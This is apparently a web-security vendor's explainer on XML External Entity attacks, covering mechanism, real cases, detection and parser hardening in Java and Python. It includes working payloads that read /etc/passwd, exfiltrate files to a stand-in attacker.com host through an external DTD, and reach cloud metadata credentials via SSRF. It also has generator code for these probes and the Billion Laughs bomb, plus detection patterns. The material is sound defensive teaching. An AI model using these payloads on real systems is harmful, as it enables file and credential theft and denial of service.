XML External Entity (XXE) Attack: Definition, How It Works & Prevention | PowerWAF

How an XML External Entity (XXE) Attack Works

XML supports a feature called external entities, defined in a Document Type Definition (DTD). An entity is essentially a variable: <!ENTITY name "value"> defines an internal entity, while <!ENTITY name SYSTEM "file:///etc/passwd"> defines an external entity that loads its value from an external resource — a local file, a URL, or even a network service. When a vulnerable XML parser processes input containing these declarations and then expands the entity reference (&name;) in the document body, it fetches the external resource and includes its content in the parsed output. The attacker doesn't need special access — they simply submit crafted XML to any endpoint that parses XML input.
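To make the mechanism concrete, here is a toy model in Python of what a naive parser does. It collects `<!ENTITY>` declarations from the DOCTYPE, resolves SYSTEM entities through a fetch callback, and substitutes each `&name;` reference. It is a regex-based illustration under simplifying assumptions, not a real XML parser; `fake_fetch` and its one-entry dictionary are hypothetical stand-ins for the server's filesystem or network.

```python
import re
from typing import Callable, Dict

# Toy model only: matches <!ENTITY name "value"> and <!ENTITY name SYSTEM "uri">
ENTITY_DECL = re.compile(r'<!ENTITY\s+(\w+)\s+(SYSTEM\s+)?"([^"]*)"\s*>')
DOCTYPE = re.compile(r'<!DOCTYPE[^\[>]*\[.*?\]>', re.S)
ENTITY_REF = re.compile(r'&(\w+);')


def toy_expand(document: str, fetch: Callable[[str], str]) -> str:
    """Mimic a parser that resolves external entities: declare, fetch, substitute."""
    entities: Dict[str, str] = {}
    for name, system_kw, value in ENTITY_DECL.findall(document):
        # Internal entity: the quoted text is the value.
        # External entity: the quoted text is a URI whose content becomes the value.
        entities[name] = fetch(value) if system_kw else value
    body = DOCTYPE.sub("", document)  # the DTD itself is not part of the output
    # Replace each &name; with its value; leave unknown references untouched
    return ENTITY_REF.sub(lambda m: entities.get(m.group(1), m.group(0)), body)


# Hypothetical stand-in for the server's filesystem
FAKE_FILES = {"file:///etc/passwd": "root:x:0:0:root:/root:/bin/bash"}


def fake_fetch(uri: str) -> str:
    return FAKE_FILES.get(uri, "")


internal = '<!DOCTYPE foo [<!ENTITY name "value">]><root>&name;</root>'
external = '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>'
print(toy_expand(internal, fake_fetch))  # <root>value</root>
print(toy_expand(external, fake_fetch))  # <root>root:x:0:0:root:/root:/bin/bash</root>
```

The only difference between the two cases is the SYSTEM keyword: the parser treats the quoted string as a location to read rather than as literal text, which is exactly the step that hardening disables.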

Identify XML input surfaces

The attacker maps all endpoints that accept or process XML: SOAP/REST API endpoints with Content-Type: application/xml or text/xml, file upload forms that accept DOCX/XLSX/SVG/XML files (all are XML-based), SAML SSO endpoints, RSS/Atom feed importers, XML-RPC endpoints, configuration file importers, and any endpoint that accepts multipart data where one part might be parsed as XML. Even JSON APIs may be vulnerable if the server also accepts XML (many frameworks auto-negotiate Content-Type). The attacker switches Content-Type from application/json to application/xml and submits equivalent XML — if the server processes it, XXE testing begins.
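Defenders can run the same inventory in reverse. A minimal Python heuristic, assuming request bodies and uploads are available as raw bytes, flags inputs that will end up in an XML parser: raw XML or SVG, and Office Open XML archives (DOCX/XLSX/PPTX), which are ZIP files containing a `[Content_Types].xml` part. The function name and the prefixes checked are illustrative choices, not an exhaustive list.

```python
import io
import zipfile

# Prefixes of bodies that go straight to an XML parser (illustrative, not exhaustive)
XML_PREFIXES = (b"<?xml", b"<!doctype", b"<svg")


def looks_xml_based(data: bytes) -> bool:
    """Heuristic: would this request body or upload reach an XML parser?"""
    head = data.lstrip()[:64].lower()
    if head.startswith(XML_PREFIXES):
        return True
    # DOCX/XLSX/PPTX are ZIP archives whose parts include [Content_Types].xml
    if data.startswith(b"PK\x03\x04"):
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as archive:
                return "[Content_Types].xml" in archive.namelist()
        except zipfile.BadZipFile:
            return False
    return False
```

Any input this returns True for belongs on the list of surfaces whose parser configuration needs checking.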

Test for basic XXE with a known file

The attacker submits XML containing an external entity that references a known, readable file: <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>. If the response contains the file's content (the /etc/passwd user list), classic XXE is confirmed. On Windows, a common test file is C:\Windows\win.ini, referenced as file:///C:/Windows/win.ini. If the response doesn't reflect the entity value (the application doesn't echo the parsed XML), the attacker pivots to out-of-band (OOB) XXE, using an HTTP entity that triggers a callback to an attacker-controlled server: <!ENTITY xxe SYSTEM "http://attacker.com/xxe-test">. A DNS lookup or HTTP request for that host in the attacker's server logs confirms the vulnerability even without visible output.
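For authorized testing, the probes described above can be generated programmatically. This sketch builds the classic payload for a given URI and checks a response for markers of the two known test files. The marker strings ('root:x:0:0' from a typical /etc/passwd, '[fonts]' from a default win.ini) and the attacker.com callback host are assumptions for illustration.

```python
from typing import Dict

# Target URIs from the text; attacker.com stands for a callback host you control
PROBE_URIS: Dict[str, str] = {
    "linux": "file:///etc/passwd",
    "windows": "file:///C:/Windows/win.ini",
    "oob": "http://attacker.com/xxe-test",
}

# Strings that typically appear in the test files (assumed, not guaranteed)
REFLECTION_MARKERS = ("root:x:0:0", "[fonts]")


def build_probe(uri: str, root: str = "root") -> str:
    """Declare an external entity pointing at `uri` and reference it in the body."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "{uri}">]>'
        f"<{root}>&xxe;</{root}>"
    )


def looks_reflected(response_body: str) -> bool:
    """True if the response appears to echo the content of a known test file."""
    return any(marker in response_body for marker in REFLECTION_MARKERS)
```

If `looks_reflected` stays False for every file probe, the OOB probe is the next step, and confirmation then comes from the callback server's logs rather than from the response body.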

Exfiltrate data via out-of-band channels

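For blind XXE (no direct output), the attacker uses parameter entities to exfiltrate data through HTTP or DNS. The definitions live in an external DTD hosted on the attacker's server, because the XML specification does not allow parameter-entity references inside markup declarations in the internal subset: (1) define a parameter entity that reads a local file: <!ENTITY % data SYSTEM "file:///etc/passwd">; (2) define a second parameter entity whose value declares a third one that embeds the file content in a URL: <!ENTITY % exfil "<!ENTITY &#x25; send SYSTEM 'http://attacker.com/?d=%data;'>">, where the nested '%' is written as the character reference &#x25; so that it is not read as the start of a parameter-entity reference; (3) end the DTD with %exfil; %send; to declare the entity and then trigger the request; (4) submit a document that references the external DTD: <!DOCTYPE foo SYSTEM "http://attacker.com/evil.dtd">. The parser fetches the external DTD, processes the chained entity definitions, reads the local file, and sends its contents to the attacker's server as a URL parameter. DNS-based exfiltration, which encodes the data in a lookup for an attacker-controlled domain, can work even when outbound HTTP is blocked.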
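The chained definitions are easy to get wrong by hand, especially the &#x25; escape. This sketch generates the external DTD and the trigger document from the steps above, and decodes the value the collector receives. The attacker.com URLs are the placeholders used in the text, and the query parameter name d is taken from the example.

```python
from urllib.parse import parse_qs, urlsplit


def build_exfil_dtd(file_uri: str, collector_url: str) -> str:
    """External DTD (e.g. evil.dtd) implementing steps 1-3."""
    return (
        # Step 1: parameter entity whose value is the target file's content
        f'<!ENTITY % data SYSTEM "{file_uri}">\n'
        # Step 2: %data; in this literal is expanded when %exfil is declared;
        # &#x25; is a character reference, so it becomes '%' in the replacement
        # text without being read as a parameter-entity reference
        f"<!ENTITY % exfil \"<!ENTITY &#x25; send SYSTEM '{collector_url}?d=%data;'>\">\n"
        # Step 3: expanding %exfil; declares %send, referencing %send; fetches the URL
        "%exfil;\n"
        "%send;\n"
    )


def build_trigger(dtd_url: str) -> str:
    """Step 4: the document actually submitted to the target."""
    return f'<?xml version="1.0"?><!DOCTYPE foo SYSTEM "{dtd_url}"><foo/>'


def decode_callback(request_target: str) -> str:
    """Recover the exfiltrated value from a request path logged by the collector."""
    return parse_qs(urlsplit(request_target).query).get("d", [""])[0]
```

For example, `build_exfil_dtd("file:///etc/hostname", "http://attacker.com/")` yields the DTD to host, and a logged request for `/?d=web01` decodes to `web01`.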

Perform SSRF via XXE

XXE is a powerful SSRF vector. By using entities with http:// or https:// URIs pointing to internal resources, the attacker forces the XML parser to make server-side requests: <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/"> lists the IAM role attached to an AWS instance, and a follow-up request for that role name returns its temporary credentials. This works against the legacy IMDSv1 endpoint; IMDSv2 requires a session token obtained with a PUT request, which an entity URI cannot issue. <!ENTITY xxe SYSTEM "http://internal-api.corp:8080/admin/users"> accesses internal APIs. The XML parser acts as a proxy that sends requests from the server's trusted network position, bypassing the firewalls, VPNs, and network segmentation that would block the same requests from outside.
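When reviewing parser logs or outbound-connection alerts, it helps to classify the URIs an entity tried to reach. This Python sketch flags non-HTTP schemes, cloud metadata endpoints, private or loopback addresses, and hostnames under internal-looking suffixes. The `INTERNAL_SUFFIXES` tuple is a hypothetical placeholder for your own naming conventions, and hostnames are not resolved, so a public-looking name that resolves to an internal address would be missed. It is a triage aid, not a defense: with external entities disabled, none of these requests happen in the first place.

```python
import ipaddress
from typing import Optional
from urllib.parse import urlsplit

METADATA_HOSTS = {"169.254.169.254", "metadata.google.internal"}
# Hypothetical: replace with the DNS suffixes your internal services use
INTERNAL_SUFFIXES = (".corp", ".internal", ".local")


def ssrf_risk(uri: str) -> Optional[str]:
    """Return a reason string if an entity URI targets something internal, else None."""
    parts = urlsplit(uri)
    if parts.scheme not in ("http", "https"):
        return f"non-HTTP scheme: {parts.scheme}"
    host = (parts.hostname or "").lower()
    if host in METADATA_HOSTS:
        return "cloud metadata endpoint"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # A hostname: without resolving it, only its suffix hints at "internal"
        return "internal hostname" if host.endswith(INTERNAL_SUFFIXES) else None
    if ip.is_private or ip.is_loopback or ip.is_link_local:
        return "private, loopback, or link-local address"
    return None
```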

Denial of service and code execution

DTD processing also enables potent DoS attacks: the 'Billion Laughs' attack (XML bomb) defines nested internal entities that expand exponentially, so nine levels of 10x expansion produce 10^9 (one billion) copies of a short string from about 1 KB of XML, consuming all available memory and crashing the parser. Code execution is possible in specific configurations: PHP's expect:// wrapper (expect://id) executes system commands when used as an entity URI, but only if the PECL expect extension is installed, and Java applications that also process attacker-controlled XSLT can be made to run code through XSLT extension functions. Even without direct code execution, the combination of file reading (extracting credentials) and SSRF (accessing internal services) often provides a pathway to full server compromise.
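The arithmetic behind the bomb can be checked without ever parsing it. This sketch builds the classic payload as a string and computes the size of its full expansion as len(base) * fanout ** levels; it deliberately never hands the payload to a parser. The function names and defaults (nine levels, fanout 10, base 'lol') are illustrative.

```python
def billion_laughs(levels: int = 9, fanout: int = 10) -> str:
    """Build the classic XML bomb as text. Never feed it to an unhardened parser."""
    decls = ['<!ENTITY lol "lol">']
    prev = "lol"
    for i in range(1, levels + 1):
        name = f"lol{i}"
        body = f"&{prev};" * fanout  # each level references the previous one `fanout` times
        decls.append(f'<!ENTITY {name} "{body}">')
        prev = name
    return (
        '<?xml version="1.0"?>\n<!DOCTYPE lolz [\n  '
        + "\n  ".join(decls)
        + f"\n]>\n<lolz>&{prev};</lolz>"
    )


def expanded_size(levels: int = 9, fanout: int = 10, base: str = "lol") -> int:
    """Characters produced by expanding the top-level entity once."""
    return len(base) * fanout ** levels


payload = billion_laughs()
print(len(payload))     # under 1 KB of input
print(expanded_size())  # 3000000000 characters, about 3 GB
```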

Real-World Examples

2014

Facebook XXE via DOCX upload (Bug Bounty)

Security researcher Mohamed Ramadan discovered that Facebook's careers page processed uploaded DOCX resumes through an XML parser vulnerable to XXE. A DOCX file is a ZIP archive containing XML files — by modifying the internal XML to include an external entity pointing to a local file, the researcher read files from Facebook's servers. Facebook confirmed the vulnerability, patched it, and awarded a bug bounty. The case demonstrated that any file format based on XML (DOCX, XLSX, PPTX, ODT, SVG) can be an XXE vector, even when the application doesn't appear to accept raw XML input.

2018

SAML comment-injection flaw affecting multiple SSO libraries

Researchers from Duo Security (now part of Cisco) disclosed a vulnerability affecting several SAML SSO libraries across multiple languages, including OneLogin's python-saml and ruby-saml. SAML, the protocol underpinning enterprise single sign-on, uses signed XML messages. The flaw was not XXE but a closely related XML-parsing weakness: signature verification ran over a canonicalized form of the document that ignores XML comments, while the libraries extracted the user identifier in a way that stopped at an inserted comment. An attacker with a valid account could therefore alter a signed assertion and authenticate as a different user. The case shows how parser-level details in SAML processing turn into authentication bypasses, and SAML endpoints that parse attacker-supplied XML with DTD processing enabled are an XXE surface for the same reason.

2016

Uber XXE via XLSX fare calculation

A researcher discovered that Uber's driver partner portal processed uploaded XLSX spreadsheets with a vulnerable XML parser. By crafting an XLSX file containing XXE payloads in the internal XML documents, the researcher achieved local file reading on Uber's servers. The vulnerability was in the fare calculation import feature where drivers uploaded spreadsheets. Uber awarded a $10,000 bug bounty. The case highlighted how XXE can hide in any feature that processes structured document formats — spreadsheets, word documents, presentations — not just obvious XML APIs.

Impact & Risk Assessment

XXE is generally rated High severity (it was a dedicated OWASP Top 10 category in 2017 as A4: XML External Entities, and the 2021 edition folded it into A05: Security Misconfiguration) because it provides a versatile toolkit for attackers: local file disclosure reveals credentials, keys, and source code; SSRF enables access to cloud metadata endpoints and internal services; DoS via XML bombs can crash production systems; and in specific configurations, code execution is achievable. The attack surface is deceptively large, because XXE isn't limited to explicit XML APIs: any application processing DOCX, XLSX, SVG, SAML, RSS, SOAP, or configuration files may be vulnerable. The prevalence of XML in enterprise systems (SOAP services, SAML SSO, document processing pipelines) means that XXE continues to affect critical infrastructure even as newer applications move to JSON, and it remains a regularly reported vulnerability class in bug bounty programs.

How to Detect XML External Entity (XXE) Attacks

Monitor for XXE indicators across multiple layers: (1) WAF rules detecting DOCTYPE declarations, ENTITY definitions, and SYSTEM/PUBLIC keywords in incoming XML payloads, since these rarely appear in legitimate application input; (2) scanning for general entity references (&xxe;), parameter-entity references (%dtd;), and suspicious URIs in XML content (file://, expect://, php://, or http:// pointing to internal IPs or metadata endpoints); (3) monitoring outbound network connections from XML processing services, because a parser making HTTP/DNS requests to unexpected destinations indicates XXE or SSRF exploitation; (4) application-level logging that records XML parsing events and flags any external entity resolution; (5) memory monitoring on XML processing services, where sudden memory spikes can indicate XML bomb (Billion Laughs) attacks; (6) intrusion detection rules for known XXE payloads in HTTP request bodies and multipart upload content.
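Items (1), (2), and (6) amount to pattern checks on request bodies. A minimal Python version, assuming the raw body bytes are available, might look like the following. The indicator names and the scheme list are illustrative, the UTF-16 handling covers only BOM-prefixed bodies, and a regex filter like this is a monitoring aid rather than a substitute for parser hardening.

```python
import re
from typing import Dict, List, Pattern

INDICATORS: Dict[str, Pattern[str]] = {
    "doctype": re.compile(r"<!DOCTYPE", re.I),
    "entity_decl": re.compile(r"<!ENTITY", re.I),
    "external_id": re.compile(r"\b(SYSTEM|PUBLIC)\s+[\"']", re.I),
    "param_entity_ref": re.compile(r"%[A-Za-z_][\w.-]*;"),
    "dangerous_uri": re.compile(r"\b(file|expect|php|jar|gopher|netdoc)://", re.I),
    "metadata_ip": re.compile(r"169\.254\.169\.254"),
}


def decode_body(body: bytes) -> str:
    """Decode a request body; UTF-16 re-encoding is a known trick to evade byte rules."""
    if body.startswith((b"\xff\xfe", b"\xfe\xff")):
        return body.decode("utf-16")
    return body.decode("utf-8", errors="replace")


def xxe_indicators(body: bytes) -> List[str]:
    """Names of all indicators present in the body, in a stable order."""
    text = decode_body(body)
    return [name for name, pattern in INDICATORS.items() if pattern.search(text)]
```

A classic payload such as `<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>` trips the doctype, entity_decl, external_id, and dangerous_uri indicators, while ordinary XML trips none.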

How to Prevent XML External Entity (XXE) Attacks

The primary defense is disabling DTD and external entity processing in the XML parser; this single configuration change neutralizes nearly all XXE variants. Implementation varies by language: (1) Java: DocumentBuilderFactory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); (2) Python: parse untrusted input with the defusedxml library rather than directly with xml.etree or third-party parsers; its parse functions accept forbid_dtd, forbid_entities, and forbid_external arguments, where the last two default to True and forbid_dtd must be set explicitly; (3) PHP: libxml_disable_entity_loader(true) on PHP < 8.0 (the function is deprecated in PHP 8.0, where external entity loading is disabled by default with libxml2 2.9 and later), and never pass LIBXML_NOENT or LIBXML_DTDLOAD to the parser; (4) .NET: XmlReaderSettings.DtdProcessing = DtdProcessing.Prohibit; (5) Ruby/Nokogiri: keep the default NONET option and never enable NOENT, which turns entity substitution on, for example Nokogiri::XML(input) { |config| config.strict.nonet }. Additionally: validate XML input against schemas (XSD), reject XML containing DOCTYPE declarations at the WAF level, convert XML APIs to JSON where possible, keep XML processing libraries updated, and apply least privilege to the service account running XML processing to limit the impact of file disclosure.
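Where adding defusedxml is not an option, the reject-DOCTYPE policy can be sketched with the standard library alone: a first pass with `xml.parsers.expat` raises as soon as a DOCTYPE starts, before any entity is declared, and only documents that pass are handed to ElementTree. This is a hedged sketch of one approach, similar in spirit to defusedxml's forbid_dtd option; `DTDForbiddenError`, `reject_dtd`, and `parse_without_dtd` are hypothetical names.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DTDForbiddenError(ValueError):
    """Raised when an untrusted document contains a DOCTYPE declaration."""


def reject_dtd(data: bytes) -> None:
    """First pass: fail on the first DOCTYPE, before any entity can be declared."""
    parser = expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise DTDForbiddenError(f"DOCTYPE {name!r} is not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(data, True)  # malformed input raises expat.ExpatError


def parse_without_dtd(data: bytes) -> ET.Element:
    """Parse untrusted XML only after confirming it has no DTD."""
    reject_dtd(data)
    return ET.fromstring(data)
```

Parsing twice costs some CPU, but the first pass stops at the DOCTYPE, so no entity is ever declared or expanded for a rejected document.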

Code Examples

Classic XXE: Local file disclosure
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<user>
  <name>&xxe;</name>
  <email>attacker@example.com</email>
</user>

<!-- Server response includes the contents of /etc/passwd:
<user>
  <name>root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
  ...</name>
  <email>attacker@example.com</email>
</user>
-->

<!-- Blind XXE via out-of-band exfiltration: -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
  <!ENTITY % file SYSTEM "file:///etc/hostname">
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
]>
<data>&send;</data>

<!-- evil.dtd hosted on attacker's server:
  <!ENTITY % payload "<!ENTITY send SYSTEM 'http://attacker.com/exfil?d=%file;'>">
  %payload;
-->

Vulnerable vs. Secure: Java XML parsing
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.DocumentBuilder;
import org.w3c.dom.Document;
import java.io.ByteArrayInputStream;

public class XMLProcessor {

    // VULNERABLE: Default Java DocumentBuilder allows external entities
    public Document parseUnsafe(String xml) throws Exception {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        // No security features configured — XXE is possible!
        DocumentBuilder builder = factory.newDocumentBuilder();
        return builder.parse(new ByteArrayInputStream(xml.getBytes()));
    }

    // SECURE: Disable DTDs and external entities entirely
    public Document parseSafe(String xml) throws Exception {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();

        // Disallow DTDs entirely (the nuclear option — most effective)
        factory.setFeature(
            "http://apache.org/xml/features/disallow-doctype-decl", true);

        // Defense-in-depth: disable external entities even if DTD is somehow allowed
        factory.setFeature(
            "http://xml.org/sax/features/external-general-entities", false);
        factory.setFeature(
            "http://xml.org/sax/features/external-parameter-entities", false);

        // Disable external DTD loading
        factory.setFeature(
            "http://apache.org/xml/features/nonvalidating/load-external-dtd", false);

        // Disable XInclude processing and keep entity references unexpanded
        factory.setXIncludeAware(false);
        factory.setExpandEntityReferences(false);

        DocumentBuilder builder = factory.newDocumentBuilder();
        return builder.parse(new ByteArrayInputStream(xml.getBytes()));
    }
}

Secure: Python XML parsing with defusedxml
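# AVOID for untrusted XML: the standard library's xml.etree does not fetch
# external entities, but it expands internal ones, so with expat older than
# 2.4.1 it is open to entity-expansion DoS (Billion Laughs); other parsers may
# resolve external entities depending on version and options.
# import xml.etree.ElementTree as ET  # DO NOT USE for untrusted XML
# tree = ET.parse('input.xml')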

# SECURE: Use the defusedxml library (pip install defusedxml)
import defusedxml.ElementTree as ET
from defusedxml import DefusedXmlException
from defusedxml.common import DTDForbidden, EntitiesForbidden

def parse_xml_safely(xml_string: str) -> dict:
    """Parse XML input with all dangerous features disabled."""
    try:
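        # defusedxml blocks by default:
        # - Entity declarations (raises EntitiesForbidden)
        # - External entity references (raises ExternalReferenceForbidden)
        # forbid_dtd=True additionally rejects any DOCTYPE (raises DTDForbidden);
        # without it, the DTDForbidden handler below would never fire
        root = ET.fromstring(xml_string, forbid_dtd=True)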

        return {
            'tag': root.tag,
            'text': root.text,
            'children': [
                {'tag': child.tag, 'text': child.text}
                for child in root
            ]
        }

    except DTDForbidden:
        raise ValueError('XML with DTD declarations is not allowed')
    except EntitiesForbidden:
        raise ValueError('XML with entity definitions is not allowed')
    except DefusedXmlException as e:
        raise ValueError(f'Potentially malicious XML blocked: {e}')
    except ET.ParseError as e:
        raise ValueError(f'Invalid XML: {e}')


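# For DOCX/XLSX/PPTX uploads (ZIP archives of XML parts). SVG is a single
# XML document and can go straight through parse_xml_safely().
def safe_process_docx(file_path: str) -> dict:
    """Parse every XML part of a DOCX file with XXE protection."""
    import zipfile
    import defusedxml.ElementTree as SafeET

    parsed = {}
    with zipfile.ZipFile(file_path, 'r') as z:
        # Any XML part (document, styles, headers, .rels, [Content_Types].xml)
        # can carry a DOCTYPE, so parse all of them, not a hand-picked subset
        for name in z.namelist():
            if name.endswith(('.xml', '.rels')):
                with z.open(name) as f:
                    # forbid_dtd=True rejects any DOCTYPE; entity declarations
                    # and external references are blocked by default
                    parsed[name] = SafeET.parse(f, forbid_dtd=True)
    return parsed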

Frequently Asked Questions

Applications without an explicit XML API can still be vulnerable; assuming otherwise is one of the most common misconceptions about XXE. Any application that processes XML-based file formats is potentially vulnerable: DOCX/XLSX/PPTX (Office Open XML), SVG images, RSS/Atom feeds, SAML authentication messages, XHTML input, SOAP requests, PDF files with XFA forms, and configuration files (web.config, .plist, pom.xml). If your application accepts file uploads and processes any of these formats, it may be vulnerable to XXE even if it has no XML API endpoint.

The Billion Laughs attack (also called an XML bomb) is a DoS attack using nested entity expansion. It defines a base entity lol and nine more, lol1 to lol9, each referencing the previous one 10 times: <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> ... up to lol9. The base entity 'lol' is just 3 bytes, but after 9 levels of 10x expansion a single reference to lol9 produces 10^9 (one billion) copies, approximately 3 GB of text from a ~1 KB XML document. This exhausts the parser's memory and crashes the process. The defense is to limit entity expansion depth and total expanded size, or simply disallow DTD processing.
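The size limit can be enforced before anything is expanded. This sketch handles internal entities only and assumes the DTD text is available as a string. It computes how large a reference would become using memoized recursion (linear in the number of declarations, unlike the expansion itself) and rejects documents over a budget. The 10,000,000-character default is an arbitrary illustrative limit; real parsers such as libxml2 and recent expat versions ship their own amplification limits.

```python
import re
from typing import Dict, FrozenSet

DECL = re.compile(r'<!ENTITY\s+(\w+)\s+"([^"]*)"\s*>')  # internal entities only
REF = re.compile(r"&(\w+);")
PREDEFINED = {"amp", "lt", "gt", "quot", "apos"}  # each expands to one character


def expansion_size(doctype: str, entity: str) -> int:
    """Characters that &entity; would expand to, computed without expanding it."""
    values: Dict[str, str] = dict(DECL.findall(doctype))
    memo: Dict[str, int] = {}

    def size(name: str, active: FrozenSet[str]) -> int:
        if name in PREDEFINED:
            return 1
        if name in memo:
            return memo[name]
        if name in active:
            raise ValueError(f"recursive entity reference: {name}")
        value = values[name]  # KeyError for undeclared entities
        literal = len(REF.sub("", value))  # text that is not a reference
        total = literal + sum(size(ref, active | {name}) for ref in REF.findall(value))
        memo[name] = total
        return total

    return size(entity, frozenset())


def check_entity_budget(doctype: str, entity: str, limit: int = 10_000_000) -> int:
    """Return the expanded size, or raise ValueError if it exceeds the budget."""
    n = expansion_size(doctype, entity)
    if n > limit:
        raise ValueError(f"&{entity}; would expand to {n:,} characters (limit {limit:,})")
    return n
```

Because each entity's size is computed once and reused, the ten-declaration bomb is measured in a handful of steps, and the 3,000,000,000-character result is rejected without allocating it.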

JSON itself doesn't support entity declarations or external references, so JSON parsing is not vulnerable to XXE. However, many web frameworks accept both JSON and XML (content negotiation), and an attacker can send an XML payload with Content-Type: application/xml to an endpoint that normally receives JSON. If the framework automatically parses XML when the Content-Type header indicates it, the endpoint becomes vulnerable to XXE despite being designed for JSON. Always explicitly restrict the accepted Content-Type to only the formats your application needs.
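Restricting Content-Type can be as simple as an allowlist check that runs before any body parsing. The sketch below is framework-agnostic and assumes the raw header value is available; the allowlist and the choice to answer HTTP 415 (Unsupported Media Type) are illustrative.

```python
from typing import FrozenSet, Optional

ALLOWED_MEDIA_TYPES: FrozenSet[str] = frozenset({"application/json"})


def media_type(content_type: Optional[str]) -> str:
    """'Application/JSON; charset=utf-8' -> 'application/json'."""
    if not content_type:
        return ""
    return content_type.split(";", 1)[0].strip().lower()


def content_type_status(content_type: Optional[str]) -> int:
    """HTTP status to use: 200 to continue, 415 to refuse before parsing the body."""
    return 200 if media_type(content_type) in ALLOWED_MEDIA_TYPES else 415
```

The check only helps if it runs before the framework selects a body parser, so an XML body is refused instead of being auto-negotiated into an XML parser.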

A WAF provides valuable protection by detecting DOCTYPE declarations, ENTITY definitions, SYSTEM/PUBLIC keywords, and known XXE payloads in HTTP request bodies. PowerWAF's XXE detection covers direct XML payloads, XXE in multipart file uploads (DOCX, XLSX, SVG), encoded variants, and parameter entity abuse. However, WAF protection should complement — not replace — parser-level hardening (disabling external entities) because some XXE vectors use legitimate-looking XML structures that are difficult to distinguish from normal input without deep content inspection.

XXE is one of the most powerful SSRF delivery mechanisms. When an XML parser resolves an external entity with an HTTP/HTTPS URI, it makes a server-side request from the application server's network position. This allows the attacker to access internal services (http://internal-api:8080/), cloud metadata endpoints (http://169.254.169.254/), and other resources behind the firewall, exactly like traditional SSRF. The key difference is the delivery mechanism: traditional SSRF exploits application logic that makes HTTP requests, while XXE exploits the XML parser itself. Defenses placed in the application's own HTTP request code (such as URL allowlists) therefore do not stop XXE, and parser hardening does not stop traditional SSRF; network egress filtering helps against both.

PowerWAF automatically blocks XML External Entity (XXE) attacks at the edge.

Deploy in minutes. No code changes required. Free plan available.
